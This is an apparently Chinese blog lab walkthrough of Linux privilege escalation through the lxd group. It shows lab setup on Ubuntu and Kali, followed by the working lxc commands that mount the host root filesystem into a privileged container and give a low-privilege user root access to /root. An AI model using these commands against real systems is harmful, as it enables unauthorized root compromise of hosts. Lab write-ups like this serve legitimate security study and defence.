【内网攻防】利用Lxd进行Linux权限提升

Autumn7299

已于 2024-05-06 00:30:46 修改

阅读量544

点赞数 15

分类专栏：安全攻防文章标签：安全容器 linux

于 2024-05-05 18:50:48 首次发布

本文链接：https://blog.csdn.net/weixin_46022776/article/details/138471060

版权

安全攻防专栏收录该内容

10 篇文章 2 订阅

订阅专栏

Ubuntu

root安装lxd、lxc、lxc-templates 以及 zfsutils-linux

cps@ubuntu:~$ sudo su root
root@ubuntu:/home/cps# apt install lxd lxc lxc-templates
E: Could not get lock /var/lib/dpkg/lock-frontend - open (11: Resource temporarily unavailable)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), is another process using it?
root@ubuntu:/home/cps# cd Desktop/
root@ubuntu:/home/cps/Desktop# ll
total 12
drwxr-xr-x  2 cps cps 4096 5月   5 12:59 ./
drwxr-xr-x 15 cps cps 4096 5月   5 12:57 ../
-rw-------  1 cps cps  150 5月   4 18:22 lock.sh
root@ubuntu:/home/cps/Desktop# chmod 777 lock.sh 
root@ubuntu:/home/cps/Desktop# ./lock.sh 
Hit:1 http://security.ubuntu.com/ubuntu bionic-security InRelease              
Hit:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease              
Hit:3 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease
Hit:4 http://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease
Reading package lists... Done                     
Building dependency tree       
Reading state information... Done
319 packages can be upgraded. Run 'apt list --upgradable' to see them.


root@ubuntu:/home/cps/Desktop# apt install lxd lxc lxc-templates
root@ubuntu:/home/cps/Desktop# apt install zfsutils-linux

创建一个普通账户aaa添加到lxd组

root@ubuntu:/home/cps# useradd aaa
root@ubuntu:/home/cps# passwd aaa
Enter new UNIX password: 111111
Retype new UNIX password: 111111
passwd: password updated successfully

root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
root@ubuntu:/home/cps# cat /etc/group | grep aaa
aaa:x:1001:

root@ubuntu:/home/cps# usermod -G lxd aaa
root@ubuntu:/home/cps# cat /etc/group | grep aaa
lxd:x:127:cps,aaa
aaa:x:1001:
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa),127(lxd)
root@ubuntu:/home/cps#

lxd初始化

root@ubuntu:/home/cps# lxd init

选项[default=zfs] ，这里改选dir，其他回车默认
在这里插入图片描述

lxc启动容器

本地如果没有ubuntu，会自动下载，时间比较久

root@ubuntu:/home/cps# lxc launch ubuntu
To start your first container, try: lxc launch ubuntu:18.04

Creating the container
The local image 'ubuntu' couldn't be found, trying 'ubuntu:' instead.
Retrieving image: rootfs: 2% (101.99kB/s)

list查看容器

root@ubuntu:/home/cps# lxc launch ubuntu
Creating the container
The local image 'ubuntu' couldn't be found, trying 'ubuntu:' instead.
Container name is: fun-mustang
Starting fun-mustang
root@ubuntu:/home/cps# lxc list

在这里插入图片描述

Kail

下载alpine，build构建

┌──(root㉿kali)-[~]
└─# ping www.baidu.com
PING www.a.shifen.com (183.2.172.42) 56(84) bytes of data.
64 bytes from 183.2.172.42 (183.2.172.42): icmp_seq=1 ttl=128 time=39.3 ms
64 bytes from 183.2.172.42 (183.2.172.42): icmp_seq=2 ttl=128 time=49.5 ms
^Z
zsh: suspended  ping www.baidu.com
                                                                             
┌──(root㉿kali)-[~]
└─# git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 90.00 KiB/s, done.
Resolving deltas: 100% (15/15), done.
                                                                             
┌──(root㉿kali)-[~]
└─# cd lxd-alpine-builder 
                                                                                                                                         
┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# ./build-alpine

在这里插入图片描述

开启http服务

在这里插入图片描述
将文件alpine-v3.13-x86_64-20210218_0139.tar.gz移动到桌面/Desktop，在/Desktop目录下开启http服务


┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# cd ..                
                                                                                        
┌──(root㉿kali)-[~]
└─# cd Desktop 
                                                                                        
┌──(root㉿kali)-[~/Desktop]
└─# python -m SimpleHTTPServer                                
/usr/bin/python: No module named SimpleHTTPServer
                                                                                    

┌──(root㉿kali)-[~/lxd-alpine-builder]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

在这里插入图片描述

ip信息

┌──(root㉿kali)-[~]
└─# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host proto kernel_lo 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:fa:4e:d4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.196.3/24 brd 192.168.196.255 scope global dynamic noprefixroute eth0
       valid_lft 942sec preferred_lft 942sec
    inet6 fe80::20c:29ff:fefa:4ed4/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
                                                                             
┌──(root㉿kali)-[~]
└─#

Ubuntu

Error！！aaa无法登录图形化界面

删除aaa，重新创建用户，重新加入组

cps@ubuntu:~$ sudo su root
[sudo] password for cps: 
root@ubuntu:/home/cps# userdel aaa
root@ubuntu:/home/cps# adduser aaa
Adding user `aaa' ...
Adding new group `aaa' (1001) ...
Adding new user `aaa' (1001) with group `aaa' ...
Creating home directory `/home/aaa' ...
Copying files from `/etc/skel' ...
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
Changing the user information for aaa
Enter the new value, or press ENTER for the default
	Full Name []: 
	Room Number []: 
	Work Phone []: 
	Home Phone []: 
	Other []: 
Is the information correct? [Y/n] 
root@ubuntu:/home/cps# 
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa)
root@ubuntu:/home/cps# usermod -G lxd aaa
root@ubuntu:/home/cps# id aaa
uid=1001(aaa) gid=1001(aaa) groups=1001(aaa),127(lxd)
root@ubuntu:/home/cps# su aaa
aaa@ubuntu:/home/cps$

aaa 切换/tmp目录下载tar.gz包

aaa@ubuntu:/tmp$  wget 192.168.196.3:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz

在这里插入图片描述

映像添加到lxd并查看

aaa@ubuntu:/tmp$ ll alpine-v3.13-x86_64-20210218_0139.tar.gz 
-rw-rw-r-- 1 aaa aaa 3259593 5月   5 15:39 alpine-v3.13-x86_64-20210218_0139.tar.gz
aaa@ubuntu:/tmp$ lxc image import /tmp/alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
aaa@ubuntu:/tmp$ lxc image list

在这里插入图片描述

普通用户aaa提权

root新建file

root@ubuntu:~/snap# cd /root/
root@ubuntu:~# touch testaaa.txt
root@ubuntu:~# vi testaaa.txt 
root@ubuntu:~# cat testaaa.txt 
root can see
root@ubuntu:~# ls
snap  testaaa.txt
root@ubuntu:~#

aaa无权访问

aaa@ubuntu:~$ cd /root/
bash: cd: /root/: Permission denied
aaa@ubuntu:~$

利用lxc提权

aaa@ubuntu:~$ lxc init myimage aaa -c security.privileged=true
Creating aaa
aaa@ubuntu:~$ lxc config device add aaa mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to aaa
aaa@ubuntu:~$ lxc start aaa

在这里插入图片描述

lxc init来初始化myimage，也就是alpine系统，并创建aaa账户，通过c参数来配置安全提升策略为true，代表aaa可申请高级权限
lxc config device配置设备，add把mydevice设备添加到了aaa账户中，disk是磁盘挂载，把本机/目录挂载到容器的/mnt下，recursive即是否递归，代表是否将所有子目录及所有文件进行挂载
lxc start启动刚刚添加的用户
lxc exec执行，以aaa执行sh

提权测试

aaa@ubuntu:~$  lxc exec aaa /bin/sh
~ # id 
uid=0(root) gid=0(root)
~ # whoami
root
~ # pwd
/root
~ # cd /mnt/
/mnt #  cd root/
/mnt/root # pwd
/mnt/root
/mnt/root # cd ./root/
/mnt/root/root # ls
snap         testaaa.txt
/mnt/root/root # cat testaaa.txt 
root can see
/mnt/root/root